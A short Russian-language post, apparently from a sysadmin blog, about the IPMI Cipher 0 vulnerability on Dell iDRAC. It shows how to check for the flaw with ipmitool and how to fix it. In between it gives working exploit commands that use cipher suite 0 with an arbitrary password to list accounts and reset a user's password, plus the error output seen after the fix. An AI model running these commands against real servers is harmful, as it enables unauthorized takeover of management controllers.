Как выяснилось недавно, на Dell iDrac есть одна очень интересная уязвимость, называемая IPMI Cipher 0, как проверить что она есть у Вас
ipmitool -H xx.xx.xx.xx -U root -P password lan print| grep 'Cipher Suite Priv Max'если в выхлопе будет нечто подобное:
Cipher Suite Priv Max : aaaaaaaaaaaaaaaпоздравляю, Ваш драк можно сношать как душе угодно!
например, получим список пользователей
ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user listа теперь изменим пас какому-либо пользователю
ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user set password 5 SuperPuper123и пробуем авторизоваться через веб, удивлены?
Закрыть можно следующим образом
ipmitool -H xx.xx.xx.xx -U root -P password lan set 1 cipher_privs XXXaXXXXXXXXXXX теперь снова пробуем
ipmitool -I lanplus -C 0 -H xx.xx.xx.xx -U root -P hu user listи в итоге
Error in open session response message : no matching cipher suite
Error: Unable to establish IPMI v2 / RMCP+ session
Set User Password command failed (user 5)